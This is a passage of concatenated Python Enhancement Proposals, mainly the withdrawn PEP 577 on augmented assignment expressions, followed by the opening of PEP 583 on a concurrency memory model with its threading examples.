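The im_func and im_self slots are exposed as __func__ and __self__, and such objects can also be constructed directly with types.MethodType; for example (illustrative only):
import types

class A:
    def meth(self):
        return 42

a = A()
m = a.meth                       # a PyMethodObject
assert isinstance(m, types.MethodType)
assert m.__func__ is A.meth      # im_func: the underlying plain function
assert m.__self__ is a           # im_self: the instance it is bound to
assert types.MethodType(A.meth, a)() == 42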
References
[1] (1, 2)
Cython (http://cython.org/)
[2]
Python bug 30071, Duck-typing inspect.isfunction() (https://bugs.python.org/issue30071)
[3]
Python bug 33261, inspect.isgeneratorfunction fails on hand-created methods
(https://bugs.python.org/issue33261 and https://github.com/python/cpython/pull/6448)
[4]
Python bug 33265, contextlib.ExitStack abuses __self__
(https://bugs.python.org/issue33265 and https://github.com/python/cpython/pull/6456)
[5]
PyMethodDef documentation (https://docs.python.org/3.7/c-api/structures.html#c.PyMethodDef)
[6]
PEP proposal: unifying function/method classes (https://mail.python.org/pipermail/python-ideas/2018-March/049398.html)
Copyright
This document has been placed in the public domain.
| Withdrawn | PEP 575 – Unifying function/method classes | Standards Track | Reorganize the class hierarchy for functions and methods
with the goal of reducing the difference between
built-in functions (implemented in C) and Python functions.
Mainly, make built-in functions behave more like Python functions
without sacrificing performance. |
PEP 577 – Augmented Assignment Expressions
Author:
Alyssa Coghlan <ncoghlan at gmail.com>
Status:
Withdrawn
Type:
Standards Track
Created:
14-May-2018
Python-Version:
3.8
Post-History:
22-May-2018
Table of Contents
PEP Withdrawal
Abstract
Syntax and semantics
Augmented assignment expressions
Adding an inline assignment operator
Assignment operator precedence
Augmented assignment to names in block scopes
Augmented assignment to names in scoped expressions
Design discussion
Allowing complex assignment targets
Augmented assignment or name binding only?
Postponing a decision on expression level target declarations
Ignoring scoped expressions when determining augmented assignment targets
Treating inline assignment as an augmented assignment variant
Disallowing augmented assignments in class level scoped expressions
Comparison operators vs assignment operators
Examples
Simplifying retry loops
Simplifying if-elif chains
Capturing intermediate values from comprehensions
Allowing lambda expressions to act more like re-usable code thunks
Relationship with PEP 572
Acknowledgements
References
Copyright
PEP Withdrawal
While working on this PEP, I realised that it didn’t really address what was
actually bothering me about PEP 572’s proposed scoping rules for previously
unreferenced assignment targets, and also had some significant undesirable
consequences (most notably, allowing >>= and <<= as inline augmented
assignment operators that meant something entirely different from the >=
and <= comparison operators).
I also realised that even without dedicated syntax of their own, PEP 572
technically allows inline augmented assignments to be written using the
operator module:
from operator import iadd

if (target := iadd(target, value)) < limit:
    ...
The restriction to simple names as inline assignment targets means that the
target expression can always be repeated without side effects, and thus avoids
the ambiguity that would arise from allowing actual embedded augmented
assignments (it’s still a bad idea, since it would almost certainly be hard
for humans to read, this note is just about the theoretical limits of language
level expressiveness).
Accordingly, I withdrew this PEP without submitting it for pronouncement. At
the time I also started writing a replacement PEP that focused specifically on
the handling of assignment targets which hadn’t already been declared as local
variables in the current scope (for both regular block scopes, and for scoped
expressions), but that draft never even reached a stage where I liked it
better than the ultimately accepted proposal in PEP 572, so it was never
posted anywhere, nor assigned a PEP number.
Abstract
This is a proposal to allow augmented assignments such as x += 1 to be
used as expressions, not just statements.
As part of this, NAME := EXPR is proposed as an inline assignment expression
that uses the new augmented assignment scoping rules, rather than implicitly
defining a new local variable name the way that existing name binding
statements do. The question of allowing expression level local variable
declarations at function scope is deliberately separated from the question of
allowing expression level name bindings, and deferred to a later PEP.
This PEP is a direct competitor to PEP 572 (although it borrows heavily from that
PEP’s motivation, and even shares the proposed syntax for inline assignments).
See Relationship with PEP 572 for more details on the connections between
the two PEPs.
To improve the usability of the new expressions, a semantic split is proposed
between the handling of augmented assignments in regular block scopes (modules,
classes, and functions), and the handling of augmented assignments in scoped
expressions (lambda expressions, generator expressions, and comprehensions),
such that all inline assignments default to targeting the nearest containing
block scope.
A new compile time TargetNameError is added as a subclass of SyntaxError
to handle cases where it is deemed to be currently unclear which target is
expected to be rebound by an inline assignment, or else the target scope
for the inline assignment is considered invalid for another reason.
Syntax and semantics
Augmented assignment expressions
The language grammar would be adjusted to allow augmented assignments to
appear as expressions, where the result of the augmented assignment
expression is the same post-calculation reference as is being bound to the
given target.
For example:
>>> n = 0
>>> n += 5
5
>>> n -= 2
3
>>> n *= 3
9
>>> n
9
For mutable targets, this means the result is always just the original object:
>>> seq = []
>>> seq_id = id(seq)
>>> seq += range(3)
[0, 1, 2]
>>> seq_id == id(seq)
True
Augmented assignments to attributes and container subscripts will be permitted,
with the result being the post-calculation reference being bound to the target,
just as it is for simple name targets:
def increment(self, step=1):
    return self._value += step
In these cases, __getitem__ and __getattribute__ will not be called
after the assignment has already taken place (they will only be called as
needed to evaluate the in-place operation).
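For comparison, the intended result can be approximated with today's statement syntax (Counter and _value are illustrative names; note that the explicit re-read of the attribute on the return line is exactly what the proposed expression form would avoid):
class Counter:
    def __init__(self, value=0):
        self._value = value

    def increment(self, step=1):
        self._value += step    # in-place update, as today
        return self._value     # re-reads the attribute; the PEP's form would not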
Adding an inline assignment operator
Given only the addition of augmented assignment expressions, it would be
possible to abuse a symbol like |= as a general purpose assignment
operator by defining a Target wrapper type that worked as follows:
>>> class Target:
...     def __init__(self, value):
...         self.value = value
...     def __or__(self, other):
...         return Target(other)
...
>>> x = Target(10)
>>> x.value
10
>>> x |= 42
<__main__.Target object at 0x7f608caa8048>
>>> x.value
42
This is similar to the way that storing a single reference in a list was long
used as a workaround for the lack of a nonlocal keyword, and can still be
used today (in combination with operator.setitem) to work around the
lack of expression level assignments.
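A rough sketch of that list-cell workaround (make_counter is a hypothetical helper, not something this PEP proposes):
from operator import setitem

def make_counter(start=0):
    box = [start]   # a one-element list standing in for a rebindable local
    # setitem mutates the cell inside the lambda; the tuple indexing then
    # returns the freshly stored value.
    return lambda step=1: (setitem(box, 0, box[0] + step), box[0])[1]

count = make_counter()
assert (count(), count(), count(5)) == (1, 2, 7)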
Rather than requiring such workarounds, this PEP instead proposes that
PEP 572’s “NAME := EXPR” syntax be adopted as a new inline assignment
expression that uses the augmented assignment scoping rules described below.
This cleanly handles cases where only the new value is of interest, and the
previously bound value (if any) can just be discarded completely.
Note that for both simple names and complex assignment targets, the inline
assignment operator does not read the previous reference before assigning
the new one. However, when used at function scope (either directly or inside
a scoped expression), it does not implicitly define a new local variable,
and will instead raise TargetNameError (as described for augmented
assignments below).
Assignment operator precedence
To preserve the existing semantics of augmented assignment statements,
inline assignment operators will be defined as being of lower precedence
than all other operators, including the comma pseudo-operator. This ensures
that when used as a top level expression the entire right hand side of the
expression is still interpreted as the value to be processed (even when that
value is a tuple without parentheses).
The difference this introduces relative to PEP 572 is that where
(n := first, second) sets n = first in PEP 572, in this PEP it would set
n = (first, second), and getting the first meaning would require an extra
set of parentheses (((n := first), second)).
PEP 572 quite reasonably notes that this results in ambiguity when assignment
expressions are used as function call arguments. This PEP resolves that concern
a different way by requiring that assignment expressions be parenthesised
when used as arguments to a function call (unless they’re the sole argument).
This is a more relaxed version of the restriction placed on generator
expressions (which always require parentheses, except when they’re the sole
argument to a function call).
Augmented assignment to names in block scopes
No target name binding changes are proposed for augmented assignments at module
or class scope (this also includes code executed using “exec” or “eval”). These
will continue to implicitly declare a new local variable as the binding target
as they do today, and (if necessary) will be able to resolve the name from an
outer scope before binding it locally.
At function scope, augmented assignments will be changed to require that there
be either a preceding name binding or variable declaration to explicitly
establish the target name as being local to the function, or else an explicit
global or nonlocal declaration. TargetNameError, a new
SyntaxError subclass, will be raised at compile time if no such binding or
declaration is present.
For example, the following code would compile and run as it does today:
x = 0
x += 1                 # Sets global "x" to 1

class C:
    x += 1             # Sets local "x" to 2, leaves global "x" alone

def local_target():
    x = 0
    x += 1             # Sets local "x" to 1, leaves global "x" alone

def global_target():
    global x
    x += 1             # Increments global "x" each time this runs

def nonlocal_target():
    x = 0
    def g():
        nonlocal x
        x += 1         # Increments "x" in outer scope each time this runs
        return x
    return g
The following examples would all still compile and then raise an error at runtime
as they do today:
n += 1             # Raises NameError at runtime

class C:
    n += 1         # Raises NameError at runtime

def missing_global():
    global n
    n += 1         # Raises NameError at runtime

def delayed_nonlocal_initialisation():
    def f():
        nonlocal n
        n += 1
    f()            # Raises NameError at runtime
    n = 0

def skipped_conditional_initialisation():
    if False:
        n = 0
    n += 1         # Raises UnboundLocalError at runtime

def local_declaration_without_initial_assignment():
    n: typing.Any
    n += 1         # Raises UnboundLocalError at runtime
Whereas the following would raise a compile time DeprecationWarning
initially, and eventually change to report a compile time TargetNameError:
def missing_target():
    x += 1   # Compile time TargetNameError due to ambiguous target scope
             # Is there a missing initialisation of "x" here? Or a missing
             # global or nonlocal declaration?
As a conservative implementation approach, the compile time function name
resolution change would be introduced as a DeprecationWarning in Python
3.8, and then converted to TargetNameError in Python 3.9. This avoids
potential problems in cases where an unused function would currently raise
UnboundLocalError if it was ever actually called, but the code is actually
unused - converting that latent runtime defect to a compile time error qualifies
as a backwards incompatible change that requires a deprecation period.
When augmented assignments are used as expressions in function scope (rather
than as standalone statements), there aren’t any backwards compatibility
concerns, so the compile time name binding checks would be enforced immediately
in Python 3.8.
Similarly, the new inline assignment expressions would always require explicit
predeclaration of their target scope when used as part of a function, at least
for Python 3.8. (See the design discussion section for notes on potentially
revisiting that restriction in the future).
Augmented assignment to names in scoped expressions
Scoped expressions is a new collective term being proposed for expressions that
introduce a new nested scope of execution, either as an intrinsic part of their
operation (lambda expressions, generator expressions), or else as a way of
hiding name binding operations from the containing scope (container
comprehensions).
Unlike regular functions, these scoped expressions can’t include explicit
global or nonlocal declarations to rebind names directly in an outer
scope.
Instead, their name binding semantics for augmented assignment expressions would
be defined as follows:
augmented assignment targets used in scoped expressions are expected to either
be already bound in the containing block scope, or else have their scope
explicitly declared in the containing block scope. If no suitable name
binding or declaration can be found in that scope, then TargetNameError
will be raised at compile time (rather than creating a new binding within
the scoped expression).
if the containing block scope is a function scope, and the target name is
explicitly declared as global or nonlocal, then it will use the
same scope declaration in the body of the scoped expression
if the containing block scope is a function scope, and the target name is
a local variable in that function, then it will be implicitly declared as
nonlocal in the body of the scoped expression
if the containing block scope is a class scope, then TargetNameError will
always be raised, with a dedicated message indicating that combining class
scopes with augmented assignments in scoped expressions is not currently
permitted.
if a name is declared as a formal parameter (lambda expressions), or as an
iteration variable (generator expressions, comprehensions), then that name
is considered local to that scoped expression, and attempting to use it as
the target of an augmented assignment operation in that scope, or any nested
scoped expression, will raise TargetNameError (this is a restriction that
could potentially be lifted later, but is being proposed for now to simplify
the initial set of compile time and runtime semantics that needs to be
covered in the language reference and handled by the compiler and interpreter)
For example, the following code would work as shown:
>>> global_target = 0
>>> incr_global_target = lambda: global_target += 1
>>> incr_global_target()
1
>>> incr_global_target()
2
>>> global_target
2
>>> def cumulative_sums(data, start=0):
...     total = start
...     yield from (total += value for value in data)
...     return total
...
>>> print(list(cumulative_sums(range(5))))
[0, 1, 3, 6, 10]
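For comparison, a sketch of how the same cumulative-sums case can be written under the assignment expressions that were ultimately accepted in PEP 572, which likewise bind comprehension targets in the containing scope (at the cost of repeating the name):
def cumulative_sums(data, start=0):
    total = start
    # PEP 572's := rebinds "total" in the enclosing function scope,
    # so the running total survives the generator expression.
    yield from (total := total + value for value in data)
    return total

assert list(cumulative_sums(range(5))) == [0, 1, 3, 6, 10]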
While the following examples would all raise TargetNameError:
class C:
    cls_target = 0
    incr_cls_target = lambda: cls_target += 1  # Error due to class scope

def missing_target():
    incr_x = lambda: x += 1  # Error due to missing target "x"

def late_target():
    incr_x = lambda: x += 1  # Error due to "x" being declared after use
    x = 1

lambda arg: arg += 1  # Error due to attempt to target formal parameter

[x += 1 for x in data]  # Error due to attempt to target iteration variable
As augmented assignments currently can’t appear inside scoped expressions, the
above compile time name resolution exceptions would be included as part of the
initial implementation rather than needing to be phased in as a potentially
backwards incompatible change.
Design discussion
Allowing complex assignment targets
The initial drafts of this PEP kept PEP 572’s restriction to single name targets
when augmented assignments were used as expressions, allowing attribute and
subscript targets solely for the statement form.
However, enforcing that required varying the permitted targets based on whether
or not the augmented assignment was a top level expression or not, as well as
explaining why n += 1, (n += 1), and self.n += 1 were all legal,
but (self.n += 1) was prohibited, so the proposal was simplified to allow
all existing augmented assignment targets for the expression form as well.
Since this PEP defines TARGET := EXPR as a variant on augmented assignment,
that also gained support for attribute and subscript targets.
Augmented assignment or name binding only?
PEP 572 makes a reasonable case that the potential use cases for inline
augmented assignment are notably weaker than those for inline assignment in
general, so it’s acceptable to require that they be spelled as x := x + 1,
bypassing any in-place augmented assignment methods.
While this is at least arguably true for the builtin types (where potential
counterexamples would probably need to focus on set manipulation use cases
that the PEP author doesn’t personally have), it would also rule out more
memory intensive use cases like manipulation of NumPy arrays, where the data
copying involved in out-of-place operations can make them impractical as
alternatives to their in-place counterparts.
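A small illustration of that cost difference with NumPy (the array size is arbitrary):
import numpy as np

a = np.zeros(10_000_000)   # ~80 MB of float64
b = np.ones_like(a)

a += b       # in-place: writes into a's existing buffer, no extra allocation
c = a + b    # out-of-place: allocates a second ~80 MB array before binding c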
That said, this PEP mainly exists because the PEP author found the inline
assignment proposal much easier to grasp as “It’s like +=, only skipping
the addition step”, and also liked the way that that framing provides an
actual semantic difference between NAME = EXPR and NAME := EXPR at
function scope.
That difference in target scoping behaviour means that the NAME := EXPR
syntax would be expected to have two primary use cases:
as a way of allowing assignments to be embedded as an expression in an if
or while statement, or as part of a scoped expression
as a way of requesting a compile time check that the target name be previously
declared or bound in the current function scope
At module or class scope, NAME = EXPR and NAME := EXPR would be
semantically equivalent due to the compiler’s lack of visibility into the set
of names that will be resolvable at runtime, but code linters and static
type checkers would be encouraged to enforce the same “declaration or assignment
required before use” behaviour for NAME := EXPR as the compiler would
enforce at function scope.
Postponing a decision on expression level target declarations
At least for Python 3.8, usage of inline assignments (whether augmented or not)
at function scope would always require a preceding name binding or scope
declaration to avoid getting TargetNameError, even when used outside a
scoped expression.
The intent behind this requirement is to clearly separate the following two
language design questions:
Can an expression rebind a name in the current scope?
Can an expression declare a new name in the current scope?
For module global scopes, the answer to both of those questions is unequivocally
“Yes”, because it’s a language level guarantee that mutating the globals()
dict will immediately impact the runtime module scope, and global NAME
declarations inside a function can have the same effect (as can importing the
currently executing module and modifying its attributes).
For class scopes, the answer to both questions is also “Yes” in practice,
although less unequivocally so, since the semantics of locals() are
currently formally unspecified. However, if the current behaviour of locals()
at class scope is taken as normative (as PEP 558 proposes), then this is
essentially the same scenario as manipulating the module globals, just using
locals() instead.
For function scopes, however, the current answers to these two questions are
respectively “Yes” and “No”. Expression level rebinding of function locals is
already possible thanks to lexically nested scopes and explicit nonlocal NAME
expressions. While this PEP will likely make expression level rebinding more
common than it is today, it isn’t a fundamentally new concept for the language.
By contrast, declaring a new function local variable is currently a statement
level action, involving one of:
an assignment statement (NAME = EXPR, OTHER_TARGET = NAME = EXPR, etc)
a variable declaration (NAME : EXPR)
a nested function definition
a nested class definition
a for loop
a with statement
an except clause (with limited scope of access)
The historical trend for the language has actually been to remove support for
expression level declarations of function local names, first with the
introduction of “fast locals” semantics (which made the introduction of names
via locals() unsupported for function scopes), and again with the hiding
of comprehension iteration variables in Python 3.0.
Now, it may be that in Python 3.9, we decide to revisit this question based on
our experience with expression level name binding in Python 3.8, and decide that
we really do want expression level function local variable declarations as well,
and that we want NAME := EXPR to be the way we spell that (rather than,
for example, spelling inline declarations more explicitly as
NAME := EXPR given NAME, which would permit them to carry type annotations,
and also permit them to declare new local variables in scoped expressions,
rather than having to pollute the namespace in their containing scope).
But the proposal in this PEP is that we explicitly give ourselves a full
release to decide how much we want that feature, and exactly where we find
its absence irritating. Python has survived happily without expression level
name bindings or declarations for decades, so we can afford to give ourselves
a couple of years to decide if we really want both of those, or if expression
level bindings are sufficient.
Ignoring scoped expressions when determining augmented assignment targets
When discussing possible binding semantics for PEP 572’s assignment expressions,
Tim Peters made a plausible case [1], [2], [3] for assignment expressions targeting
the containing block scope, essentially ignoring any intervening scoped
expressions.
This approach allows use cases like cumulative sums, or extracting the final
value from a generator expression to be written in a relatively straightforward
way:
total = 0
partial_sums = [total := total + value for value in data]
factor = 1
while any(n % (factor := p) == 0 for p in small_primes):
    n //= factor
Guido also expressed his approval for this general approach [4].
The proposal in this PEP differs from Tim’s original proposal in three main
areas:
it applies the proposal to all augmented assignment operators, not just a
single new name binding operator
as far as is practical, it extends the augmented assignment requirement that
the name already be defined to the new name binding operator (raising
TargetNameError rather than implicitly declaring new local variables at
function scope)
it includes lambda expressions in the set of scopes that get ignored for
target name binding purposes, making this transparency to assignments common
to all of the scoped expressions rather than being specific to comprehensions
and generator expressions
With scoped expressions being ignored when calculating binding targets, it’s
once again difficult to detect the scoping difference between the outermost
iterable expressions in generator expressions and comprehensions (you have to
mess about with either class scopes or attempting to rebind iteration variables
to detect it), so there’s also no need to tinker with that.
Treating inline assignment as an augmented assignment variant
One of the challenges with PEP 572 is the fact that NAME = EXPR and
NAME := EXPR are entirely semantically equivalent at every scope. This
makes the two forms hard to teach, since there’s no inherent nudge towards
choosing one over the other at the statement level, so you end up having to
resort to “NAME = EXPR is preferred because it’s been around longer”
(and PEP 572 proposes to enforce that historical idiosyncrasy at the compiler
level).
That semantic equivalence is difficult to avoid at module and class scope while
still having if NAME := EXPR: and while NAME := EXPR: work sensibly, but
at function scope the compiler’s comprehensive view of all local names makes
it possible to require that the name be assigned or declared before use,
providing a reasonable incentive to continue to default to using the
NAME = EXPR form when possible, while also enabling the use of the
NAME := EXPR as a kind of simple compile time assertion (i.e. explicitly
indicating that the targeted name has already been bound or declared and hence
should already be known to the compiler).
If Guido were to declare that support for inline declarations was a hard
design requirement, then this PEP would be updated to propose that
EXPR given NAME also be introduced as a way to support inline name declarations
after arbitrary expressions (this would allow the inline name declarations to be
deferred until the end of a complex expression rather than needing to be
embedded in the middle of it, and PEP 8 would gain a recommendation encouraging
that style).
Disallowing augmented assignments in class level scoped expressions
While modern classes do define an implicit closure that’s visible to method
implementations (in order to make __class__ available for use in zero-arg
super() calls), there’s no way for user level code to explicitly add
additional names to that scope.
Meanwhile, attributes defined in a class body are ignored for the purpose of
defining a method’s lexical closure, which means adding them there wouldn’t
work at an implementation level.
Rather than trying to resolve that inherent ambiguity, this PEP simply
prohibits such usage, and requires that any affected logic be written somewhere
other than directly inline in the class body (e.g. in a separate helper
function).
Comparison operators vs assignment operators
The OP= construct as an expression currently indicates a comparison
operation:
x == y # Equals
x >= y # Greater-than-or-equal-to
x <= y # Less-than-or-equal-to
Both this PEP and PEP 572 propose adding at least one operator that’s somewhat
similar in appearance, but defines an assignment instead:
x := y # Becomes
This PEP then goes much further and allows all 13 augmented assignment symbols
to be used as binary operators:
x += y # In-place add
x -= y # In-place minus
x *= y # In-place multiply
x @= y # In-place matrix multiply
x /= y # In-place division
x //= y # In-place int division
x %= y # In-place mod
x &= y # In-place bitwise and
x |= y # In-place bitwise or
x ^= y # In-place bitwise xor
x <<= y # In-place left shift
x >>= y # In-place right shift
x **= y # In-place power
Of those additional binary operators, the most questionable would be the
bitshift assignment operators, since they’re each only one doubled character
away from one of the inclusive ordered comparison operators.
Examples
Simplifying retry loops
There are currently a few different options for writing retry loops, including:
# Post-decrementing a counter
remaining_attempts = MAX_ATTEMPTS
while remaining_attempts:
    remaining_attempts -= 1
    try:
        result = attempt_operation()
    except Exception as exc:
        continue # Failed, so try again
    log.debug(f"Succeeded after {MAX_ATTEMPTS - remaining_attempts} attempts")
    break # Success!
else:
    raise OperationFailed(f"Failed after {MAX_ATTEMPTS} attempts") from exc
# Loop-and-a-half with a pre-incremented counter
attempts = 0
while True:
    attempts += 1
    if attempts > MAX_ATTEMPTS:
        raise OperationFailed(f"Failed after {MAX_ATTEMPTS} attempts") from exc
    try:
        result = attempt_operation()
    except Exception as exc:
        continue # Failed, so try again
    log.debug(f"Succeeded after {attempts} attempts")
    break # Success!
Each of the available options hides some aspect of the intended loop structure
inside the loop body, whether that’s the state modification, the exit condition,
or both.
The proposal in this PEP allows both the state modification and the exit
condition to be included directly in the loop header:
attempts = 0
while (attempts += 1) <= MAX_ATTEMPTS:
    try:
        result = attempt_operation()
    except Exception as exc:
        continue # Failed, so try again
    log.debug(f"Succeeded after {attempts} attempts")
    break # Success!
else:
    raise OperationFailed(f"Failed after {MAX_ATTEMPTS} attempts") from exc
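For comparison, a roughly equivalent loop header is already possible under the assignment expression syntax that was eventually accepted in PEP 572, at the cost of repeating the name (a sketch only; attempt_operation, MAX_ATTEMPTS and OperationFailed are stand-ins from the examples above):
attempts = 0
while (attempts := attempts + 1) <= MAX_ATTEMPTS:
    try:
        result = attempt_operation()
    except Exception:
        continue  # Failed, so try again
    break  # Success!
else:
    raise OperationFailed(f"Failed after {MAX_ATTEMPTS} attempts")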
Simplifying if-elif chains
if-elif chains that need to rebind the checked condition currently need to
be written using nested if-else statements:
m = pattern.match(data)
if m:
    ...
else:
    m = other_pattern.match(data)
    if m:
        ...
    else:
        m = yet_another_pattern.match(data)
        if m:
            ...
        else:
            ...
As with PEP 572, this PEP allows the else/if portions of that chain to be
condensed, making their consistent and mutually exclusive structure more
readily apparent:
m = pattern.match(data)
if m:
    ...
elif m := other_pattern.match(data):
    ...
elif m := yet_another_pattern.match(data):
    ...
else:
    ...
Unlike PEP 572, this PEP requires that the assignment target be explicitly
indicated as local before the first use as a := target, either by
binding it to a value (as shown above), or else by including an appropriate
explicit type declaration:
m: typing.re.Match
if m := pattern.match(data):
    ...
elif m := other_pattern.match(data):
    ...
elif m := yet_another_pattern.match(data):
    ...
else:
    ...
Capturing intermediate values from comprehensions
The proposal in this PEP makes it straightforward to capture and reuse
intermediate values in comprehensions and generator expressions by
exporting them to the containing block scope:
factor: int
while any(n % (factor := p) == 0 for p in small_primes):
    n //= factor
total = 0
partial_sums = [total += value for value in data]
Allowing lambda expressions to act more like re-usable code thunks
This PEP allows the classic closure usage example:
def make_counter(start=0):
    x = start
    def counter(step=1):
        nonlocal x
        x += step
        return x
    return counter
To be abbreviated as:
def make_counter(start=0):
x = start
return lambda step=1: x += step
While the latter form is still a conceptually dense piece of code, it can be
reasonably argued that the lack of boilerplate (where the “def”, “nonlocal”,
and “return” keywords and two additional repetitions of the “x” variable name
have been replaced with the “lambda” keyword) may make it easier to read in
practice.
Relationship with PEP 572
The case for allowing inline assignments at all is made in PEP 572. This
competing PEP was initially going to propose an alternate surface syntax
(EXPR given NAME = EXPR), while retaining the expression semantics from
PEP 572, but that changed when discussing one of the initial motivating use
cases for allowing embedded assignments at all: making it possible to easily
calculate cumulative sums in comprehensions and generator expressions.
As a result of that, and unlike PEP 572, this PEP focuses primarily on use
cases for inline augmented assignment. It also has the effect of converting
cases that currently inevitably raise UnboundLocalError at function call
time to report a new compile time TargetNameError.
New syntax for a name rebinding expression (NAME := EXPR) is then added
not only to handle the same use cases as are identified in PEP 572, but also
as a lower level primitive to help illustrate, implement and explain
the new augmented assignment semantics, rather than being the sole change being
proposed.
The author of this PEP believes that this approach makes the value of the new
flexibility in name rebinding clearer, while also mitigating many of the
potential concerns raised with PEP 572 around explaining when to use
NAME = EXPR over NAME := EXPR (and vice-versa), without resorting to
prohibiting the bare statement form of NAME := EXPR outright (such
that NAME := EXPR is a compile error, but (NAME := EXPR) is permitted).
Acknowledgements
The PEP author wishes to thank Chris Angelico for his work on PEP 572, and his
efforts to create a coherent summary of the great many sprawling discussions
that spawned on both python-ideas and python-dev, as well as Tim Peters for
the in-depth discussion of parent local scoping that prompted the above
scoping proposal for augmented assignments inside scoped expressions.
Eric Snow’s feedback on a pre-release version of this PEP helped make it
significantly more readable.
References
[1]
The beginning of Tim’s genexp & comprehension scoping thread
(https://mail.python.org/pipermail/python-ideas/2018-May/050367.html)
[2]
Reintroducing the original cumulative sums use case
(https://mail.python.org/pipermail/python-ideas/2018-May/050544.html)
[3]
Tim’s language reference level explanation of his proposed scoping semantics
(https://mail.python.org/pipermail/python-ideas/2018-May/050729.html)
[4]
Guido’s endorsement of Tim’s proposed genexp & comprehension scoping
(https://mail.python.org/pipermail/python-ideas/2018-May/050411.html)
Copyright
This document has been placed in the public domain.
| Withdrawn | PEP 577 – Augmented Assignment Expressions | Standards Track | This is a proposal to allow augmented assignments such as x += 1 to be
used as expressions, not just statements. |
PEP 583 – A Concurrency Memory Model for Python
Author:
Jeffrey Yasskin <jyasskin at google.com>
Status:
Withdrawn
Type:
Informational
Created:
22-Mar-2008
Post-History:
Table of Contents
Abstract
Rationale
A couple definitions
Two simple memory models
Sequential Consistency
Happens-before consistency
An example
Surprising behaviors with races
Zombie values
Inconsistent Orderings
A happens-before race that’s not a sequentially-consistent race
Self-justifying values
Uninitialized values (direct)
Uninitialized values (flag)
Inconsistent guarantees from relying on data dependencies
The rules for Python
Data-race-free programs are sequentially consistent
No security holes from out-of-thin-air reads
Restrict reorderings instead of defining happens-before
Atomic, unordered assignments
Two tiers of guarantees
Sequential Consistency
Adapt the x86 model
Upgrading or downgrading to an alternate model
Implementation Details
CPython
PyPy
Jython
IronPython
References
Acknowledgements
Copyright
Abstract
This PEP describes how Python programs may behave in the presence of
concurrent reads and writes to shared variables from multiple threads.
We use a happens before relation to define when variable accesses
are ordered or concurrent. Nearly all programs should simply use locks
to guard their shared variables, and this PEP highlights some of the
strange things that can happen when they don’t, but programmers often
assume that it’s ok to do “simple” things without locking, and it’s
somewhat unpythonic to let the language surprise them. Unfortunately,
avoiding surprise often conflicts with making Python run quickly, so
this PEP tries to find a good tradeoff between the two.
Rationale
So far, we have 4 major Python implementations – CPython, Jython,
IronPython, and PyPy – as well as lots of minor ones. Some of
these already run on platforms that do aggressive optimizations. In
general, these optimizations are invisible within a single thread of
execution, but they can be visible to other threads executing
concurrently. CPython currently uses a GIL to ensure that other
threads see the results they expect, but this limits it to a single
processor. Jython and IronPython run on Java’s or .NET’s threading
system respectively, which allows them to take advantage of more cores
but can also show surprising values to other threads.
So that threaded Python programs continue to be portable between
implementations, implementers and library authors need to agree on
some ground rules.
A couple definitions
Variable: A name that refers to an object. Variables are generally
introduced by assigning to them, and may be destroyed by passing
them to del. Variables are fundamentally mutable, while
objects may not be. There are several varieties of variables:
module variables (often called “globals” when accessed from within
the module), class variables, instance variables (also known as
fields), and local variables. All of these can be shared between
threads (the local variables if they’re saved into a closure).
The object in which the variables are scoped notionally has a
dict whose keys are the variables’ names.
Object: A collection of instance variables (a.k.a. fields) and methods.
At least, that’ll do for this PEP.
Program Order: The order that actions (reads and writes) happen within a thread,
which is very similar to the order they appear in the text.
Conflicting actions: Two actions on the same variable, at least one of which is a write.
Data race: A situation in which two conflicting actions happen at the same
time. “The same time” is defined by the memory model.
Two simple memory models
Before talking about the details of data races and the surprising
behaviors they produce, I’ll present two simple memory models. The
first is probably too strong for Python, and the second is probably
too weak.
Sequential Consistency
In a sequentially-consistent concurrent execution, actions appear to
happen in a global total order with each read of a particular variable
seeing the value written by the last write that affected that
variable. The total order for actions must be consistent with the
program order. A program has a data race on a given input when one of
its sequentially consistent executions puts two conflicting actions
next to each other.
This is the easiest memory model for humans to understand, although it
doesn’t eliminate all confusion, since operations can be split in odd
places.
Happens-before consistency
The program contains a collection of synchronization actions, which
in Python currently include lock acquires and releases and thread
starts and joins. Synchronization actions happen in a global total
order that is consistent with the program order (they don’t have to
happen in a total order, but it simplifies the description of the
model). A lock release synchronizes with all later acquires of the
same lock. Similarly, given t = threading.Thread(target=worker):
A call to t.start() synchronizes with the first statement in
worker().
The return from worker() synchronizes with the return from
t.join().
If the return from t.start() happens before (see below) a call
to t.isAlive() that returns False, the return from
worker() synchronizes with that call.
We call the source of the synchronizes-with edge a release operation
on the relevant variable, and we call the target an acquire operation.
The happens before order is the transitive closure of the program
order with the synchronizes-with edges. That is, action A happens
before action B if:
A falls before B in the program order (which means they run in the
same thread)
A synchronizes with B
You can get to B by following happens-before edges from A.
An execution of a program is happens-before consistent if each read
R sees the value of a write W to the same variable such that:
R does not happen before W, and
There is no other write V that overwrote W before R got a
chance to see it. (That is, it can’t be the case that W happens
before V happens before R.)
You have a data race if two conflicting actions aren’t related by
happens-before.
An example
Let’s use the rules from the happens-before model to prove that the
following program prints “[7]”:
class Queue:
    def __init__(self):
        self.l = []
        self.cond = threading.Condition()

    def get(self):
        with self.cond:
            while not self.l:
                self.cond.wait()
            ret = self.l[0]
            self.l = self.l[1:]
            return ret

    def put(self, x):
        with self.cond:
            self.l.append(x)
            self.cond.notify()

myqueue = Queue()

def worker1():
    x = [7]
    myqueue.put(x)

def worker2():
    y = myqueue.get()
    print y

thread1 = threading.Thread(target=worker1)
thread2 = threading.Thread(target=worker2)
thread2.start()
thread1.start()
Because myqueue is initialized in the main thread before
thread1 or thread2 is started, that initialization happens
before worker1 and worker2 begin running, so there’s no way
for either to raise a NameError, and both myqueue.l and
myqueue.cond are set to their final objects.
The initialization of x in worker1 happens before it calls
myqueue.put(), which happens before it calls
myqueue.l.append(x), which happens before the call to
myqueue.cond.release(), all because they run in the same
thread.
In worker2, myqueue.cond will be released and re-acquired
until myqueue.l contains a value (x). The call to
myqueue.cond.release() in worker1 happens before that last
call to myqueue.cond.acquire() in worker2.
That last call to myqueue.cond.acquire() happens before
myqueue.get() reads myqueue.l, which happens before
myqueue.get() returns, which happens before print y, again
all because they run in the same thread.
Because happens-before is transitive, the list initially stored in
x in thread1 is initialized before it is printed in thread2.
Usually, we wouldn’t need to look all the way into a thread-safe
queue’s implementation in order to prove that uses were safe. Its
interface would specify that puts happen before gets, and we’d reason
directly from that.
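For instance, with the standard library's queue module (Python 3 spelling; a sketch, not part of this PEP), the interface guarantee alone is enough to reason about the program:
import queue
import threading

q = queue.Queue()

def worker1():
    q.put([7])        # the put() happens before the matching get()

def worker2():
    print(q.get())    # safe: sees the fully initialized list and prints [7]

t2 = threading.Thread(target=worker2)
t1 = threading.Thread(target=worker1)
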